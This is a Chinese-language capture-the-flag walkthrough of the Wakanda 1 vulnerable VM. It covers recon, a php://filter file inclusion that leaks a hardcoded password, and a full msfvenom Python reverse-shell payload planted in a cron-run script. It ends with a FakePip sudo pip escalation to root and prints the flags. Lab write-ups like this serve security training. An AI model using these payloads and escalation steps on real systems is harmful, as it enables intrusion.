Write-Up-wakanda-1

关于

祖传开头

信息收集

  • 这里用vm虚拟机可能有一点问题,因为官方的是用vbox虚拟机导出的镜像文件。所以这次使用vbox虚拟机。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
➜  ~ ip a show dev vboxnet0 
6: vboxnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 0a:00:27:00:00:00 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0
valid_lft forever preferred_lft forever
inet6 fe80::800:27ff:fe00:0/64 scope link
valid_lft forever preferred_lft forever
➜ ~ nmap -sn 192.168.56.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 20:00 CST
Nmap scan report for 192.168.56.1
Host is up (0.0011s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00057s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.77 seconds
  • IP是192.168.56.101,除了开放了RPC服务和以前的没什么太大的变化。从Web入手。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
➜  ~ nmap -T4 -A 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 20:01 CST
Nmap scan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Vibranium Market
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 40326/tcp status
|_ 100024 1 54014/udp status
3333/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 1c:98:47:56:fc:b8:14:08:8f:93:ca:36:44:7f:ea:7a (DSA)
| 2048 f1:d5:04:78:d3:3a:9b:dc:13:df:0f:5f:7f:fb:f4:26 (RSA)
| 256 d8:34:41:5d:9b:fe:51:bc:c6:4e:02:14:5e:e1:08:c5 (ECDSA)
|_ 256 0e:f5:8d:29:3c:73:57:c7:38:08:6d:50:84:b6:6c:27 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
  • 主页是一个单页,扫一顿也没发现什么。但是F12发现了<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->,访问http://192.168.56.101/?lang=fr时主页多了一写东西。猜想这是切换语言是要包含本地文件,所以就试了试。发现存在LFI漏洞。和以前的pwnlab_init套路一样。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
➜  ~ nikto -h http://192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2018-10-16 20:06:38 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2018-10-16 20:06:57 (GMT8) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
➜ ~ dirb http://192.168.56.101/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Oct 16 20:07:03 2018
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/admin (CODE:200|SIZE:0)
+ http://192.168.56.101/backup (CODE:200|SIZE:0)
+ http://192.168.56.101/index.php (CODE:200|SIZE:1527)
+ http://192.168.56.101/secret (CODE:200|SIZE:0)
+ http://192.168.56.101/server-status (CODE:403|SIZE:302)
+ http://192.168.56.101/shell (CODE:200|SIZE:0)
-----------------
END_TIME: Tue Oct 16 20:07:05 2018
DOWNLOADED: 4612 - FOUND: 6
➜ ~

利用LFI漏洞

  • 利用php://filter/convert.base64-encode/resource获取inde页面的源码再base64解码。
1
2
➜ ~ curl "http://192.168.56.101/?lang=php://filter/convert.base64-encode/resource=index"
PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=

登录SSH

  • 在源码里找到了$password ="Niamey4Ever227!!!" ;//I have to remember it,密码找到了,有在主页里找到了Made by[@mamadou](http://192.168.56.101/#)所以用户名是mamadou。登录ssh。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜  ~ ssh mamadou@192.168.56.101 -p 3333
The authenticity of host '[192.168.56.101]:3333 ([192.168.56.101]:3333)' can't be established.
ECDSA key fingerprint is SHA256:X+fXjgH34Ta5l6I4kUSpiVZNBGGBGtjxZxgyU7KCFwk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.101]:3333' (ECDSA) to the list of known hosts.
mamadou@192.168.56.101's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug 3 15:53:29 2018 from 192.168.56.1
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
  • 但是发现这并不是系统的bash shell而是一个Python的交互命令行。这好办,都不用我输入python -c 'import pty;pty.spawn("/bin/bash")',第一个Flag到手。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Python 2.7.9 (default, Jun 29 2016, 13:08:31) 
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty
>>> pty.spawn("/bin/bash")
mamadou@Wakanda1:~$ id
uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou)
mamadou@Wakanda1:~$
mamadou@Wakanda1:~$ ls
flag1.txt
mamadou@Wakanda1:~$ cat flag1.txt

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
mamadou@Wakanda1:~$
  • 在tmp目录发现一个devops用户的一个test文件。
1
2
3
4
5
6
7
8
9
10
11
mamadou@Wakanda1:/tmp$ ls -al
total 32
drwxrwxrwt 7 root root 4096 Oct 16 08:28 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .font-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .ICE-unix
-rw-r--r-- 1 devops developer 4 Oct 16 08:24 test
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .Test-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .X11-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .XIM-unix
mamadou@Wakanda1:/tmp$
  • 搜索所以属于devops的文件,发现了一个.antivirus.py文件,然后我又回去看了一下test文件,发现更新时间一直再变,那就有可能是上面的py是会隔一段时间就会执行的。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
mamadou@Wakanda1:/tmp$ find / -user devops 2>/dev/null
/srv/.antivirus.py
/tmp/test
/home/devops
/home/devops/.bashrc
/home/devops/.profile
/home/devops/.bash_logout
/home/devops/flag2.txt
mamadou@Wakanda1:/tmp$

mamadou@Wakanda1:/srv$ cat .antivirus.py
open('/tmp/test','w').write('test')
mamadou@Wakanda1:/srv$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Aug 1 17:52 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
-rw-r--rw- 1 devops developer 36 Aug 1 20:08 .antivirus.py
mamadou@Wakanda1:/srv$
mamadou@Wakanda1:/tmp$ ls -al
total 32
drwxrwxrwt 7 root root 4096 Oct 16 08:39 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .font-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .ICE-unix
-rw-r--r-- 1 devops developer 4 Oct 16 08:39 test
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .Test-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .X11-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .XIM-unix
  • 生成msf的Python反弹后门,把代码复制到.antivirus.py里打开msf监听7777端口坐等shell。
1
2
3
4
5
6
➜  ~ msfvenom -p cmd/unix/reverse_python lhost=192.168.56.1 lport=7788 formats py R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 537 bytes
python -c "exec('aW1wb3J0IHNvY2tldCwgICAgICBzdWJwcm9jZXNzLCAgICAgIG9zICAgIDsgICAgICAgICBob3N0PSIxOTIuMTY4LjU2LjEiICAgIDsgICAgICAgICBwb3J0PTc3ODggICAgOyAgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QsICAgICAgcG9ydCkpICAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgICAgMCkgICAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgICAgICAxKSAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgIDIpICAgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
  • 经过漫长的等待,shell终于弹回来了。第二个Flag到手。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  ~ nc -lvp 7788
Connection from 192.168.56.101:50517
id
uid=1001(devops) gid=1002(developer) groups=1002(developer)
python -c 'import pty;pty.spawn("/bin/bash")'
devops@Wakanda1:/$ cd ~
cd ~
devops@Wakanda1:~$ ls
ls
flag2.txt

devops@Wakanda1:~$ cat flag2.txt
cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
devops@Wakanda1:~$

FakePip提权

  • pip可以用sudo而且不用输入密码。
1
2
3
4
5
6
7
8
9
devops@Wakanda1:~$ sudo -l
sudo -l
Matching Defaults entries for devops on Wakanda1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
(ALL) NOPASSWD: /usr/bin/pip
devops@Wakanda1:~$
  • 项目地址:点我,打开setup.py文件把里面的IP改了就可以了。项目里也有详细的教程。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
➜  FakePip git:(master) ✗ php -S 0.0.0.0:4444
PHP 7.2.10 Development Server started at Tue Oct 16 21:40:47 2018
Listening on http://0.0.0.0:4444
Document root is /home/kali-team/GitHub/FakePip
Press Ctrl-C to quit.
[Tue Oct 16 21:41:37 2018] 192.168.56.101:45377 [200]: /setup.py


devops@Wakanda1:~$ wget http://192.168.56.1:4444/setup.py
wget http://192.168.56.1:4444/setup.py
--2018-10-16 09:41:36-- http://192.168.56.1:4444/setup.py
Connecting to 192.168.56.1:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 990 [application/octet-stream]
Saving to: ‘setup.py’

setup.py 100%[=====================>] 990 --.-KB/s in 0s

2018-10-16 09:41:36 (81.4 MB/s) - ‘setup.py’ saved [990/990]

devops@Wakanda1:~$ ls
ls
flag2.txt setup.py
  • 按照项目教程执行pip安装,再用nc监听等shell。
1
2
3
4
5
6
7
8
9
10
devops@Wakanda1:~$ sudo /usr/bin/pip install . --upgrade --force-reinstall
sudo /usr/bin/pip install . --upgrade --force-reinstall
Unpacking /home/devops
Running setup.py (path:/tmp/pip-SfNBak-build/setup.py) egg_info for package from file:///home/devops

Installing collected packages: FakePip
Found existing installation: FakePip 0.0.1
Uninstalling FakePip:
Successfully uninstalled FakePip
Running setup.py install for FakePip
  • root的Flag到手。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
➜  FakePip git:(master) ✗ nc -lvp 6666
Connection from 192.168.56.101:46577
root@Wakanda1:/tmp/pip-SfNBak-build# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Wakanda1:/tmp/pip-SfNBak-build# cd
cd
root@Wakanda1:~# ls
ls
root.txt
root@Wakanda1:~# cat root.txt
cat root.txt
_ _.--.____.--._
( )=.-":;:;:;;':;:;:;"-._
\\\:;:;:;:;:;;:;::;:;:;:\
\\\:;:;:;:;:;;:;:;:;:;:;\
\\\:;::;:;:;:;:;::;:;:;:\
\\\:;:;:;:;:;;:;::;:;:;:\
\\\:;::;:;:;:;:;::;:;:;:\
\\\;;:;:_:--:_:_:--:_;:;\
\\\_.-" "-._\
\\
\\
\\
\\ Wakanda 1 - by @xMagass
\\
\\


Congratulations You are Root!

821ae63dbe0c573eff8b69d451fb21bc

root@Wakanda1:~#